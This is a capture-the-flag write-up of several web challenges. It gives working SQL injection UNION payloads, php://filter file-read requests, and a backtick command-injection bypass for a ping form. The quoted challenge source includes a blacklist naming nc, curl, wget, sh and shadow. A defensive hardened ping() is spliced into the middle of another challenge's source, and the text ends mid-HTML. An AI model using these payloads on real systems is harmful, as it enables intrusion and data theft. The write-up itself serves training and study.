The OJ said not to give out the flags directly, so I will only write up the approach~
hide and seek
The flag is right there in the page source.
Guestbook
This one is SQL injection.
First find the database name:
?mod=read&id=-1 union select 1,2,database(),4#
That shows the database is g8.
Tables:
?mod=read&id=-1 union select 1,2,(select table_name from information_schema.tables where table_schema=database() limit 0,1),4#
That reveals a table named flag.
Columns:
?mod=read&id=-1 union select 1,2,(select column_name from information_schema.columns where table_name='flag' limit 1,1),4#
That reveals a column named flag.
Finally, read the value of flag:
?mod=read&id=-1 union select 1,2,(select flag from flag limit 1,1),4#
LFI
The challenge already hints that it is the php://filter wrapper; on entering you see that it wants to access the flag file.
?page=php://filter/read=convert.base64-encode/resource=pages/flag
That returns a base64 string; decoding it shows config.
So read config as well:
?page=php://filter/read=convert.base64-encode/resource=pages/config
Decode it and you get the flag.
homepage
Look at the page source: there is a flag, but it is the one from the first challenge. Keep looking and you find cute.js; inside it is a pile of aaencode. Decoding it gives a QR code; scan it and you have the flag.
ping
Source:
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Ping</title>
</head>
<body>
    <form action="." method="GET">
        IP: <input type="text" name="ip"> <input type="submit" value="Ping">
    </form>
    <pre><?php
$blacklist = [
    'flag', 'cat', 'nc', 'sh', 'cp', 'touch', 'mv', 'rm', 'ps', 'top', 'sleep', 'sed',
    'apt', 'yum', 'curl', 'wget', 'perl', 'python', 'zip', 'tar', 'php', 'ruby', 'kill',
    'passwd', 'shadow', 'root',
    'z',
    'dir', 'dd', 'df', 'du', 'free', 'tempfile', 'touch', 'tee', 'sha', 'x64', 'g',
    'xargs', 'PATH',
    '$0', 'proc',
    '/', '&', '|', '>', '<', ';', '"', '\'', '\\', "\n"
];
set_time_limit(2);
function ping($ip) {
    global $blacklist;
    if(strlen($ip) > 15) {
        return 'IP toooooo longgggggggggg';
    } else {
        foreach($blacklist as $keyword) {
            if(strstr($ip, $keyword)) {
                return "{$keyword} not allowed";
            }
        }
        $ret = [];
        exec("ping -c 1 \"{$ip}\" 2>&1", $ret);
        return implode("\n", array_slice($ret, 0, 10));
    }
}
if(!empty($_GET['ip']))
    echo htmlentities(ping($_GET['ip']));
else
    highlight_file(__FILE__);
?></pre>
</body>
</html>
There is a blacklist that filters a lot of things, including both kinds of quote, but backticks are not filtered. Try ?ip=`ls`
That lists flag.php and index.php, but cat is blocked. Linux also has sort, which sorts a file's lines and prints them, so try sort with wildcards:
?ip=`sort ????????`
Then the flag shows up.
scoreboard
Searched around the page for a while without finding anything; in the end the flag was in the response headers.
login as admin 0
Source:
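From the defensive side, the root cause here is that the blacklist enumerates bad strings instead of validating the input, and the value is still spliced into a shell command string. Below is an added, hardened version of ping() (my own example, not the challenge's code) that allow-lists the parameter with filter_var() and passes it to the shell with escapeshellarg(); it assumes the same `ping -c 1` command and the same ?ip= form as the challenge.

```php
<?php
// Hardened replacement for the challenge's ping() (added example, not the
// challenge's original code). Rather than a blacklist, it allow-lists the
// input: only a syntactically valid IPv4/IPv6 literal ever reaches the shell.
function safe_ping(string $ip): string {
    // Anything that is not an IP literal (hostnames, backticks, wildcards,
    // shell metacharacters) fails this check and is never executed.
    if (filter_var($ip, FILTER_VALIDATE_IP) === false) {
        return 'invalid IP address';
    }
    // escapeshellarg() single-quotes the value and escapes embedded quotes,
    // so the address is delivered to ping as exactly one argument.
    $cmd = 'ping -c 1 ' . escapeshellarg($ip) . ' 2>&1';
    $ret = [];
    exec($cmd, $ret);
    return implode("\n", array_slice($ret, 0, 10));
}

// Constructed sample inputs showing what the allow-list accepts and rejects.
foreach (['127.0.0.1', '::1', '`ls`', 'example.com'] as $sample) {
    $ok = filter_var($sample, FILTER_VALIDATE_IP) !== false;
    printf("%-12s -> %s\n", $sample, $ok ? 'accepted' : 'rejected');
}

// Same dispatch as the challenge page; output is still HTML-encoded.
if (!empty($_GET['ip'])) {
    echo htmlentities(safe_ping($_GET['ip']));
}
```

The sample loop prints accepted for 127.0.0.1 and ::1 and rejected for the other two; the length check and the keyword list become unnecessary once the input is validated as an address.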
<?php
require('config.php');
// table schema
// user -> id, user, password, is_admin
if($_GET['show_source'] === '1') {
    highlight_file(__FILE__);
    exit;
}
function safe_filter($str)
{
    $strl = strtolower($str);
    if (strstr($strl, 'or 1=1') || strstr($strl, 'drop') ||
        strstr($strl, 'update') || strstr($strl, 'delete')
    ) {
        return '';
    }
    return str_replace("'", "\\'", $str);
}
$_POST = array_map(safe_filter, $_POST);
$user = null;
// connect to database
if(!empty($_POST['name']) && !empty($_POST['password'])) {
    $connection_string = sprintf('mysql:host=%s;dbname=%s;charset=utf8mb4', DB_HOST, DB_NAME);
    $db = new PDO($connection_string, DB_USER, DB_PASS);
    $sql = sprintf("SELECT * FROM `user` WHERE `user` = '%s' AND `password` = '%s'",
        $_POST['name'],
        $_POST['password']
    );
    try {
        $query = $db->query($sql);
        if($query) {
            $user = $query->fetchObject();
        } else {
            $user = false;
        }
    } catch(Exception $e) {
        $user = false;
    }
}
?><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>Login As Admin 0</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="/bootstrap/css/bootstrap.min.css" media="all">
</head>
<body>
    <div class="jumbotron">
        <div class="container">
            <h1>Login as Admin 0</h1>
        </div>
    </div>
    <div class="container">
        <div class="navbar">
            <div class="container-fluid">
                <div class="navbar-header">
                    <a class="navbar-brand" href="/">Please Hack Me</a>
                </div>
                <ul class="nav navbar-nav">
                    <li>
                        <a href="/scoreboard">Scoreboard</a>
                    </li>
                    <li>
                        <a href="?show_source=1" target="_blank">Source Code</a>
                    </li>
                </ul>
            </div>
        </div>
    </div>
    <div class="container">
        <div class="col-md-6 col-md-offset-3">
            <?php if(!$user):